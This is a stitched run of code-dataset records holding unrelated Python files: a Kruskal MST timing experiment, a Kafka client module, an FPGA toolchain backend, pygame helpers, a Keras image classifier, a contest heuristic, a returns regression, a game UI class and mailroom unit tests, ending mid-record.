heapq.heappush(h, val)\n # nalezeni a vymazani hrany s danym ohodnocenim\n #edge = find_and_remove_edge(graph, min(h))\n\n #edge = min(h)\n # vymazani hrany z haldy\n edge = heapq.heappop(h)\n\n # vynulovani prazdne prihradky\n if len(h) == 0:\n buckets[j] = []\n \n weight, vertice1, vertice2 = edge\n if find(vertice1) != find(vertice2):\n minimum_spanning_tree.add(edge)\n union(vertice1, vertice2)\n\n return minimum_spanning_tree\n\n# originalni implementace s vyuzitim union & find od israelst (https://github.com/israelst/Algorithms-Book--Python/blob/master/5-Greedy-algorithms/kruskal.py)\ndef og_kruskal(graph):\n for vertice in graph['vertices']:\n make_set(vertice)\n\n minimum_spanning_tree = set()\n edges = list(graph['edges'])\n edges.sort()\n for edge in edges: \n \n weight, vertice1, vertice2 = edge\n if find(vertice1) != find(vertice2):\n union(vertice1, vertice2)\n minimum_spanning_tree.add(edge)\n\n return minimum_spanning_tree\n\n# %% [markdown]\n# ## Time execution experiments\n# %% [markdown]\n# ### DATASET 1\n\n# %%\nDATASET = 'data/1.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['7'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n# %% [markdown]\n# ### DATASET 2\n\n# %%\nDATASET = 'data/2.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['46'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n# %% [markdown]\n# ### DATASET 3\n\n# %%\nDATASET = 'data/3.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to 
{}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['809'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n# %% [markdown]\n# ### DATASET 4\n\n# %%\nDATASET = 'data/4.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['7625'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n# %% [markdown]\n### DATASET 5\n\n\n# %%\nDATASET = 'data/5.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['170'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n# %%\nDATASET = 'data/6.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['739'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n# %%\nDATASET = 'data/7.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['212'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n\n","sub_path":"kruskal.py","file_name":"kruskal.py","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"141574042","text":"__license__ = \"\"\"\nCopyright 2012 DISQUS\nCopyright 2013 Parse.ly, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport logging\n\nfrom samsa.exceptions import NoAvailablePartitionsError\nfrom samsa.partitioners import random_partitioner\nfrom samsa.partitions import PartitionMap\nfrom samsa.consumer import Consumer\nfrom samsa.utils import attribute_repr\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass TopicMap(object):\n \"\"\"\n Provides a dictionary-like interface to :class:`~samsa.topics.Topic`\n instances within a cluster.\n\n :param cluster: The cluster this topic mapping is associated with.\n :type cluster: :class:`samsa.cluster.Cluster`\n \"\"\"\n def __init__(self, cluster):\n self.cluster = cluster\n\n self.__topics = {}\n\n def __getitem__(self, key):\n \"\"\"\n Returns a :class:`samsa.topics.Topic` for the given key.\n\n This is a proxy to :meth:`~TopicMap.get` for a more dict-like\n interface.\n \"\"\"\n return self.get(key)\n\n def get(self, name):\n \"\"\"\n Returns a :class:`samsa.topics.Topic` for this topic name, creating a\n new topic if one has not already been registered.\n \"\"\"\n topic = self.__topics.get(name, None)\n if topic is None:\n topic = self.__topics[name] = 
Topic(self.cluster, name)\n logger.info('Registered new topic: %s', topic)\n return topic\n\n\nclass Topic(object):\n \"\"\"\n A topic within a Kafka cluster.\n\n :param cluster: The cluster that this topic is associated with.\n :type cluster: :class:`samsa.cluster.Cluster`\n :param name: The name of this topic.\n :param partitioner: callable that takes two arguments, ``partitions`` and\n ``key`` and returns a single :class:`~samsa.partitions.Partition`\n instance to publish the message to.\n :type partitioner: any callable type\n \"\"\"\n def __init__(self, cluster, name, partitioner=random_partitioner):\n self.cluster = cluster\n self.name = name\n self.partitions = PartitionMap(self.cluster, self)\n self.partitioner = partitioner\n\n __repr__ = attribute_repr('name')\n\n def latest_offsets(self):\n return [(p.broker.id, p.latest_offset())\n for p\n in self.partitions]\n\n def publish(self, data, key=None):\n \"\"\"\n Publishes one or more messages to a random partition of this topic.\n\n :param data: message(s) to be sent to the broker.\n :type data: ``str`` or sequence of ``str``.\n :param key: a key to be used for semantic partitioning\n :type key: implementation-specific\n \"\"\"\n if len(self.partitions) < 1:\n raise NoAvailablePartitionsError('No partitions are available to '\n 'accept a write for this message. (Is your Kafka broker '\n 'running?)')\n partition = self.partitioner(self.partitions, key)\n return partition.publish(data)\n\n def subscribe(self,\n group,\n backoff_increment=1,\n connect_retries=4,\n fetch_size=307200,\n offset_reset='nearest',\n rebalance_retries=4,\n ):\n \"\"\"\n Returns a new consumer that can be used for reading from this topic.\n\n `backoff_increment` is used to progressively back off asking a partition\n for messages when there aren't any ready. Incrementally increases wait\n time in seconds.\n\n `offset_reset` is used to determine where to reset a partition's offset\n in the event of an OffsetOutOfRangeError. Valid values are:\n\n \"earliest\": Go to the earliest message in the partition\n \"latest\": Go to the latest message in the partition\n \"nearest\": If requested offset is before the earliest, go there,\n otherwise, go to the latest message in the partition.\n\n `rebalance_retries` and `connect_retries` affect the number of times\n to try acquiring partitions before giving up.\n\n When samsa restarts, there can be a bit of lag before\n Zookeeper realizes the old client is dead and releases the partitions\n it was consuming. Setting this means samsa will wait a bit and try to\n acquire partitions again before throwing an error. 
In the case of\n        rebalancing, sometimes it takes a bit for a consumer to release the\n        partition they're reading, and this helps account for that.\n\n        :param group: The consumer group to join.\n        :param backoff_increment: How fast to incrementally backoff when a\n            partition has no messages to read.\n        :param connect_retries: Retries before giving up on connecting\n        :param fetch_size: Default fetch size (in bytes) to get from Kafka\n        :param offset_reset: Where to reset when an OffsetOutOfRange happens\n        :param rebalance_retries: Retries before giving up on rebalance\n        :rtype: :class:`samsa.consumer.consumer.Consumer`\n        \"\"\"\n        return Consumer(self.cluster,\n                        self,\n                        group,\n                        backoff_increment=backoff_increment,\n                        connect_retries=connect_retries,\n                        fetch_size=fetch_size,\n                        offset_reset=offset_reset,\n                        rebalance_retries=rebalance_retries)\n","sub_path":"samsa/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497245113","text":"# Copyright edalize contributors\n# Licensed under the 2-Clause BSD License, see LICENSE for details.\n# SPDX-License-Identifier: BSD-2-Clause\n\nimport os.path\n\nfrom edalize.edatool import Edatool\nfrom edalize.yosys import Yosys\nfrom importlib import import_module\n\nclass Icestorm(Edatool):\n\n    argtypes = ['vlogdefine', 'vlogparam']\n\n    @classmethod\n    def get_doc(cls, api_ver):\n        if api_ver == 0:\n            yosys_help = Yosys.get_doc(api_ver)\n            icestorm_help = {\n                'members' : [\n                    {'name' : 'pnr',\n                     'type' : 'String',\n                     'desc' : 'Select Place & Route tool. Legal values are *arachne* for Arachne-PNR, *next* for nextpnr or *none* to only perform synthesis. Default is next'}],\n                'lists' : [\n                    {'name' : 'arachne_pnr_options',\n                     'type' : 'String',\n                     'desc' : 'Additional options for Arachne PNR'},\n                    {'name' : 'nextpnr_options',\n                     'type' : 'String',\n                     'desc' : 'Additional options for nextpnr'},\n                    {'name' : 'yosys_synth_options',\n                     'type' : 'String',\n                     'desc' : 'Additional options for the synth_ice40 command'},\n                ]}\n\n            combined_members = icestorm_help['members']\n            combined_lists = icestorm_help['lists']\n            yosys_members = yosys_help['members']\n            yosys_lists = yosys_help['lists']\n\n            combined_members.extend(m for m in yosys_members if m['name'] not in [i['name'] for i in combined_members])\n            combined_lists.extend(l for l in yosys_lists if l['name'] not in [i['name'] for i in combined_lists])\n\n            return {'description' : \"Open source toolchain for Lattice iCE40 FPGAs. 
Uses yosys for synthesis and arachne-pnr or nextpnr for Place & Route\",\n 'members' : combined_members,\n 'lists' : combined_lists}\n\n def configure_main(self):\n # Write yosys script file\n (src_files, incdirs) = self._get_fileset_files()\n yosys_synth_options = self.tool_options.get('yosys_synth_options', '')\n yosys_edam = {\n 'files' : self.files,\n 'name' : self.name,\n 'toplevel' : self.toplevel,\n 'parameters' : self.parameters,\n 'tool_options' : {'yosys' : {\n 'arch' : 'ice40',\n 'yosys_synth_options' : yosys_synth_options,\n 'yosys_as_subtool' : True,\n }\n }\n }\n\n yosys = getattr(import_module(\"edalize.yosys\"), 'Yosys')(yosys_edam, self.work_root)\n yosys.configure()\n\n pcf_files = []\n for f in src_files:\n if f.file_type == 'PCF':\n pcf_files.append(f.name)\n elif f.file_type == 'user':\n pass\n\n if not pcf_files:\n pcf_files = ['empty.pcf']\n with open(os.path.join(self.work_root, pcf_files[0]), 'a'):\n os.utime(os.path.join(self.work_root, pcf_files[0]), None)\n elif len(pcf_files) > 1:\n raise RuntimeError(\"Icestorm backend supports only one PCF file. Found {}\".format(', '.join(pcf_files)))\n\n pnr = self.tool_options.get('pnr', 'next')\n part = self.tool_options.get('part', None)\n if not pnr in ['arachne', 'next', 'none']:\n raise RuntimeError(\"Invalid pnr option '{}'. Valid values are 'arachne' for Arachne-pnr, 'next' for nextpnr or 'none' to only perform synthesis\".format(pnr))\n # Write Makefile\n arachne_pnr_options = self.tool_options.get('arachne_pnr_options', [])\n nextpnr_options = self.tool_options.get('nextpnr_options', [])\n template_vars = {\n 'name' : self.name,\n 'pcf_file' : pcf_files[0],\n 'pnr' : pnr,\n 'arachne_pnr_options' : arachne_pnr_options,\n 'nextpnr_options' : nextpnr_options,\n 'default_target' : 'json' if pnr == 'none' else 'bin',\n 'device' : part,\n }\n self.render_template('icestorm-makefile.j2',\n 'Makefile',\n template_vars)\n","sub_path":"edalize/icestorm.py","file_name":"icestorm.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351213854","text":"\r\nimport pygame, sys\r\nimport os.path\r\n\r\nFPS = 30 # frames per second setting\r\nCLOCKSPEED = 628 #default clockspeed\r\nimageCache = {}\r\n\r\ndef loadImage(path): \r\n\r\n if(path != None and os.path.exists(path)):\r\n try:\r\n return pygame.image.load(path)\r\n except Exception:\r\n print(\"Could not load image \" + str(path) + \" \" + str(Exception))\r\n return pygame.Surface((1,1),pygame.SRCALPHA)\r\n \r\n else:\r\n print(\"File not found \" + str(path))\r\n\r\n return pygame.Surface((1,1),pygame.SRCALPHA)\r\n\r\n\r\n\r\ndef loadCachedImage(path):\r\n if(path in imageCache):\r\n return imageCache[path]\r\n else:\r\n image = loadImage(path)\r\n imageCache[path] = image\r\n return image\r\n\r\ndef aspect_scale(img, bx,by ): \r\n ix,iy = img.get_size()\r\n if ix > iy:\r\n # fit to width\r\n scale_factor = bx/float(ix)\r\n sy = scale_factor * iy\r\n if sy > by:\r\n scale_factor = by/float(iy)\r\n sx = scale_factor * ix\r\n sy = by\r\n else:\r\n sx = bx\r\n else:\r\n # fit to height\r\n scale_factor = by/float(iy)\r\n sx = scale_factor * ix\r\n if sx > bx:\r\n scale_factor = bx/float(ix)\r\n sx = bx\r\n sy = scale_factor * iy\r\n else:\r\n sy = by\r\n\r\n return pygame.transform.scale(img, (int(sx),int(sy)) )\r\n\r\n\r\ndef blitMultilineText(surface, text, pos, font, color=pygame.Color('black')):\r\n words = [word.split(' ') for word in text.splitlines()] # 2D array where each 
row is a list of words.\r\n space = font.size(' ')[0] # The width of a space.\r\n max_width, max_height = surface.get_size()\r\n x, y = pos\r\n for line in words:\r\n for word in line:\r\n word_surface = font.render(word, 0, color)\r\n word_width, word_height = word_surface.get_size()\r\n if x + word_width >= max_width:\r\n x = pos[0] # Reset the x.\r\n y += word_height # Start on new row.\r\n surface.blit(word_surface, (x, y))\r\n x += word_width + space\r\n x = pos[0] # Reset the x.\r\n y += word_height # Start on new row.\r\n\r\ndef quick_sort(items):\r\n \"\"\" Implementation of quick sort \"\"\"\r\n if len(items) > 1:\r\n pivot_index = int(len(items) / 2)\r\n smaller_items = []\r\n larger_items = []\r\n \r\n for i, val in enumerate(items):\r\n if i != pivot_index:\r\n if val < items[pivot_index]:\r\n smaller_items.append(val)\r\n else:\r\n larger_items.append(val)\r\n \r\n quick_sort(smaller_items)\r\n quick_sort(larger_items)\r\n items[:] = smaller_items + [items[pivot_index]] + larger_items\r\n","sub_path":"Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"119646798","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom keras_preprocessing.image import ImageDataGenerator\nimport tensorflow as tf\n\nkeras = tf.keras\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\nprint(\"Num GPUs available: \", len(gpus))\n\ndef main():\n TRAINING_DIR = '../images/balls-for-study'\n training_datagen = ImageDataGenerator(\n rescale=1. / 255,\n rotation_range=60,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n validation_split=0.2,\n fill_mode='nearest')\n\n # VALIDATION_DIR = 'dataset-test'\n # validation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = training_datagen.flow_from_directory(\n TRAINING_DIR,\n target_size=(150, 150),\n class_mode='categorical',\n subset='training',\n )\n\n validation_generator = training_datagen.flow_from_directory(\n TRAINING_DIR,\n target_size=(150, 150),\n class_mode='categorical',\n subset='validation',\n )\n\n # validation_generator = validation_datagen.flow_from_directory(\n # VALIDATION_DIR,\n # target_size=(150, 150),\n # class_mode='categorical'\n # )\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(64, (3, 3), activation='relu', input_shape=(150, 150, 3)),\n tf.keras.layers.MaxPooling2D(2, 2),\n # The second convolution\n tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n # The third convolution\n tf.keras.layers.Conv2D(128, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n # The fourth convolution\n tf.keras.layers.Conv2D(128, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n # Flatten the results to feed into a DNN\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.5),\n # 512 neuron hidden layer\n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(9, activation='softmax')\n ])\n\n model.summary()\n\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n class TrainCallback(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if not logs:\n return\n\n if logs.get('accuracy') > 0.98:\n print(\"\\nReached 98% accuracy. 
Stopping training...\")\n                self.model.stop_training = True\n\n    callback = TrainCallback()\n\n    history = model.fit(\n        train_generator,\n        steps_per_epoch=train_generator.samples,\n        epochs=5,\n        validation_data=validation_generator,\n        validation_steps=validation_generator.samples,\n        verbose=1,\n    )\n\n    model.save(\"../model\")\n\n    acc = history.history['accuracy']\n    val_acc = history.history['val_accuracy']\n    loss = history.history['loss']\n    val_loss = history.history['val_loss']\n\n    epochs = range(len(acc))\n\n    plt.plot(epochs, acc, 'r', label='Training accuracy')\n    plt.plot(epochs, val_acc, 'b', label='Validation accuracy')\n    plt.title('Training and validation accuracy')\n    plt.legend(loc=0)\n    plt.figure()\n\n    plt.show()\n\n\nmain()\n","sub_path":"program_2/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"516864149","text":"# https://atcoder.jp/contests/ahc010/tasks/ahc010_a\n\nimport sys\n# input = sys.stdin.buffer.readline\nsys.setrecursionlimit(10 ** 7)\nimport time\nstart = time.time()\n\nimport random\nimport copy\n\nvx = [-1, 0, 1, 0]\nvy = [ 0,-1, 0, 1]\nROTATE = [1, 2, 3, 0, 5, 4, 7, 6]\nTO = [\n\t[1, 0, -1, -1],\n\t[3, -1, -1, 0],\n\t[-1, -1, 3, 2],\n\t[-1, 2, 1, -1],\n\t[1, 0, 3, 2],\n\t[3, 2, 1, 0],\n\t[2, -1, 0, -1],\n\t[-1, 3, -1, 1],\n    ]\n\nN = 30\nstrT = [input() for _ in range(N)]\n# T = [list(map(int, list(input()))) for _ in range(N)]\nT = [[0]*N for _ in range(N)]\nfor i in range(N):\n    for j in range(N):\n        T[i][j] = int(strT[i][j])\n# print(T)\n\ndef calc_point(ans):\n    # print(\"calc_point\")\n    point = 0\n    # deep copy so that rotating tiles does not mutate the original grid T\n    rotateT = copy.deepcopy(T)\n    gone = [[False]*N for _ in range(N)]\n    for i in range(N):\n        for j in range(N):\n            # rotateT[i][j] = int(T[i][j])\n            # print(i, j, ans[i*N+j], T[i][j])\n            for _ in range(ans[i*N+j]):\n                # print(i, j, int(rotateT[i][j]))\n                rotateT[i][j] = ROTATE[rotateT[i][j]]\n    # print(rotateT)\n\n    def dfs(si, sj, v, i, j, L):\n        # if L>=20000:\n        #     print(si, sj, v, i, j, L)\n        if si==4 and sj==6:\n            print(si, sj, v, i, j, L, rotateT[i][j])\n        if i==si and j==sj: return L+1\n        nv = TO[rotateT[i][j]][(v+2)%4]\n        if nv==-1: return -1\n        ni, nj = i+vy[nv], j+vx[nv]\n        if ni>=0 and ni<N and nj>=0 and nj<N:\n            return dfs(si, sj, nv, ni, nj, L+1)\n        return -1\n\n    # trace the loop starting from every cell and collect the loop lengths\n    Llist = []\n    for i in range(N):\n        for j in range(N):\n            if gone[i][j]:\n                continue\n            for v in range(4):\n                ni, nj = i+vy[v], j+vx[v]\n                if ni>=0 and ni<N and nj>=0 and nj<N:\n                    L = dfs(i, j, v, ni, nj, 0)\n                    if L > 0:\n                        gone[i][j] = True\n                        Llist.append(L)\n    if len(Llist)>=2:\n        Llist.sort(reverse=True)\n        point = Llist[0]*Llist[1]\n    return point\n\nbest_ans = [0] * (N * N)\nbest_point = calc_point(best_ans)\n# while time.time() < start + 1.8:\n#     ans = random.choices(range(4), k=N*N)\n#     point = calc_point(ans)\n#     # print(point, best_point, time.time() - start)\n#     if point > best_point:\n#         best_point = point\n#         best_ans = copy.copy(ans)\n\n# print(best_ans)\nprint(''.join(map(str, best_ans)))\n","sub_path":"ahc/ahc010/ahc0010_a.py","file_name":"ahc0010_a.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322024861","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pathlib import Path\r\nimport matplotlib.pyplot as plt \r\nimport matplotlib.style as style\r\nfrom matplotlib import rc\r\nimport seaborn as sns\r\nfrom math import sqrt\r\nimport statsmodels.formula.api as smf\r\n\r\nstyle.use('seaborn-darkgrid')\r\n\r\nrc('text', usetex=True)\r\n\r\nEWJ_data = Path.cwd() / 'data' / 'EWJ.csv'\r\n\r\ndf = pd.read_csv(EWJ_data, parse_dates = [1], infer_datetime_format = True)\r\ndf['Date'] = pd.to_datetime(df['Date'])\r\n\r\nday = 1\r\nweek = 5\r\nmonth = 21\r\nquarter = 63\r\nhalf = 
126\r\nyear = 252\r\nintervals = [day, week, month, quarter, half, year]\r\n\r\ndef returns_calculator(df , delta = 1):\r\n\tresult = []\r\n\ti = delta\r\n\twhile i in df.index:\r\n\t\tcurr_close, prev_close = df['Close'][i], df['Close'][i - delta]\r\n\t\treturn_rate = 100 * (curr_close - prev_close)/prev_close\r\n\t\tresult.append(return_rate)\r\n\t\ti += delta\r\n\treturn result\r\n\r\nresults = pd.DataFrame()\r\n\r\nresults['tau'] = np.array([i/252 for i in intervals])\r\nresults['Sqrttau'] = results['tau'].apply(sqrt)\r\nresults['StdDev'] = np.array([np.std(returns_calculator(df, i)) for i in intervals])\r\n\r\nmod = smf.ols(formula = 'StdDev ~ 1 + Sqrttau', data = results)\r\nres = mod.fit()\r\nprint(res.summary())\r\n\r\nfig, ax = plt.subplots()\r\n\r\nsns.regplot(\r\n\tx = 'Sqrttau', y = 'StdDev', line_kws = {'linestyle': '--', 'color': 'blue'},\r\n\t scatter_kws = {'color': 'black'}, data = results, ax = ax\r\n\t)\r\nax.set_title('Diffusion of Japanese Returns (Square Root Scale)')\r\nax.set_xlabel(r'$\\sqrt{Time(Year)}$')\r\nax.set_ylabel('Standard Deviation of Returns (\\%)')\r\nplt.show()\r\n\r\n","sub_path":"school/japanese_returns_problemsets/ps_2.py","file_name":"ps_2.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22030440","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/impl/lobby/mode_selector/items/battle_royale_mode_selector_item.py\nfrom gui.impl import backport\nfrom gui.impl.gen import R\nfrom gui.impl.gen.view_models.views.lobby.mode_selector.mode_selector_card_types import ModeSelectorCardTypes\nfrom gui.impl.lobby.mode_selector.items import setBattlePassState\nfrom gui.impl.lobby.mode_selector.items.base_item import ModeSelectorLegacyItem\nfrom helpers import dependency, time_utils\nfrom gui.impl.lobby.mode_selector.items.items_constants import ModeSelectorRewardID\nfrom gui.Scaleform.locale.EPIC_BATTLE import EPIC_BATTLE\nfrom skeletons.gui.game_control import IBattleRoyaleController\nfrom gui.impl.backport.backport_tooltip import createAndLoadBackportTooltipWindow\nfrom gui.Scaleform.genConsts.TOOLTIPS_CONSTANTS import TOOLTIPS_CONSTANTS\nfrom gui import GUI_SETTINGS\n\nclass BattleRoyaleModeSelectorItem(ModeSelectorLegacyItem):\n __slots__ = ()\n _CARD_VISUAL_TYPE = ModeSelectorCardTypes.BATTLE_ROYALE\n __battleRoyaleController = dependency.descriptor(IBattleRoyaleController)\n\n @property\n def hasExtendedCalendarTooltip(self):\n return True\n\n def getExtendedCalendarTooltip(self, parentWindow):\n return createAndLoadBackportTooltipWindow(parentWindow, tooltipId=TOOLTIPS_CONSTANTS.BATTLE_ROYALE_SELECTOR_CALENDAR_INFO, isSpecial=True, specialArgs=(None,))\n\n def _urlProcessing(self, url):\n return GUI_SETTINGS.checkAndReplaceWebBridgeMacros(url)\n\n def _onInitializing(self):\n super(BattleRoyaleModeSelectorItem, self)._onInitializing()\n self.__battleRoyaleController.onPrimeTimeStatusUpdated += self.__onUpdate\n self.__battleRoyaleController.onUpdated += self.__onUpdate\n self.__fillViewModel()\n\n def _onDisposing(self):\n self.__battleRoyaleController.onPrimeTimeStatusUpdated -= self.__onUpdate\n self.__battleRoyaleController.onUpdated -= self.__onUpdate\n super(BattleRoyaleModeSelectorItem, self)._onDisposing()\n\n def _getIsDisabled(self):\n ctrl = self.__battleRoyaleController\n season = ctrl.getCurrentSeason() or ctrl.getNextSeason()\n return not (ctrl.isEnabled() and season is not None)\n\n def 
_isInfoIconVisible(self):\n return True\n\n def __onUpdate(self, *_):\n self.__fillViewModel()\n\n def __fillViewModel(self):\n with self.viewModel.transaction() as vm:\n season = self.__battleRoyaleController.getCurrentSeason() or self.__battleRoyaleController.getNextSeason()\n currTime = time_utils.getCurrentLocalServerTimestamp()\n if season is None:\n return\n self.__resetViewModel(vm)\n if season.hasActiveCycle(currTime):\n if self.__battleRoyaleController.isEnabled():\n timeLeftStr = time_utils.getTillTimeString(season.getCycleEndDate() - currTime, EPIC_BATTLE.STATUS_TIMELEFT, removeLeadingZeros=True)\n vm.setTimeLeft(timeLeftStr)\n self._addReward(ModeSelectorRewardID.CREDITS)\n self._addReward(ModeSelectorRewardID.OTHER)\n else:\n cycleInfo = season.getNextByTimeCycle(currTime)\n if cycleInfo is not None:\n if cycleInfo.announceOnly:\n text = backport.text(R.strings.battle_royale.modeSelector.cycleIsComing())\n else:\n text = backport.text(R.strings.battle_royale.modeSelector.cycleNotStarted(), date=backport.getShortDateFormat(cycleInfo.startDate))\n vm.setStatusNotActive(text)\n vm.setTimeLeft('')\n setBattlePassState(self.viewModel)\n return\n\n @staticmethod\n def __resetViewModel(vm):\n vm.setTimeLeft('')\n vm.setStatusActive('')\n vm.setStatusNotActive('')\n vm.setEventName('')\n vm.getRewardList().clear()\n","sub_path":"source/res/scripts/client/gui/impl/lobby/mode_selector/items/battle_royale_mode_selector_item.py","file_name":"battle_royale_mode_selector_item.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"367589938","text":"import pytest\nfrom mailroom_OO import *\nfrom cli_main import *\nimport os\nfrom os import listdir\n\ndef test_Donor_initial():\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n #Verify the name, donations, total, number and average properties are correct\n assert d.name == name\n assert d.donations == donations\n assert d.tot_donations == 1919\n assert d.num_donations == 3\n assert d.avg_donation == 639.67\n\ndef test_Donor_new_donation():\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n assert d.name == name\n assert d.donations == donations\n #Verify that adding a new donation updates the properties\n d.new_donation(715)\n assert d.num_donations == 4\n assert d.donations[-1] == 715\n\ndef test_DonorCollection_initial_new_donor():\n dc = DonorCollection()\n assert dc.donor_list == []\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n #Test the donor collection for adding a new donor\n assert dc.donor_list == [d]\n\ndef test_DonorCollection_new_donation():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n #Verify that the .donor_list recreates the donor list\n assert dc.donor_list == [d]\n dc.new_donation(name, 715)\n #Verify that the added donation is included\n assert d.donations[-1] == 715\n\n name = 'Alfred Pennyworth'\n donations = [243, 968]\n d = Donor(name, donations)\n dc.new_donor(d)\n #Verify that the donor list includes the latest addition\n assert dc.donor_list[-1] == d\n\ndef test_DonorCollection_list_donors():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n name = 'Alfred Pennyworth'\n donations = [243, 968]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n #Verify the 
function that lists donors\n assert dc.list_donors() == 'Bruce Wayne\\nAlfred Pennyworth\\n'\n\ndef test_DonorCollection_ty():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645, 423, 851]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n #Verify thank you text\n assert dc.ty_text(name) == 'Dear Bruce Wayne, thanks for the $851.00'\n\ndef test_CLI_ty_letters():\n dc = DonorCollection()\n name = 'Bruce Wayne'\n donations = [645,423,851]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n name = 'Alfred Pennyworth'\n donations = [243, 968]\n d = Donor(name, donations)\n dc.new_donor(d)\n\n #Verify that \"Send letters to all Donors\" creates the appropriate .txt file\n send_letters_to_all_donors(dc)\n dir_path = os.path.dirname(os.path.realpath(__file__))\n filenames = listdir(dir_path)\n assert 'Bruce Wayne.txt' in filenames\n assert 'Alfred Pennyworth.txt' in filenames","sub_path":"students/kevin_t/lesson9/test_mailroom.py","file_name":"test_mailroom.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286408623","text":"'''\nThis script presuppose the Sigmorphon 2020 shared task 0 data is 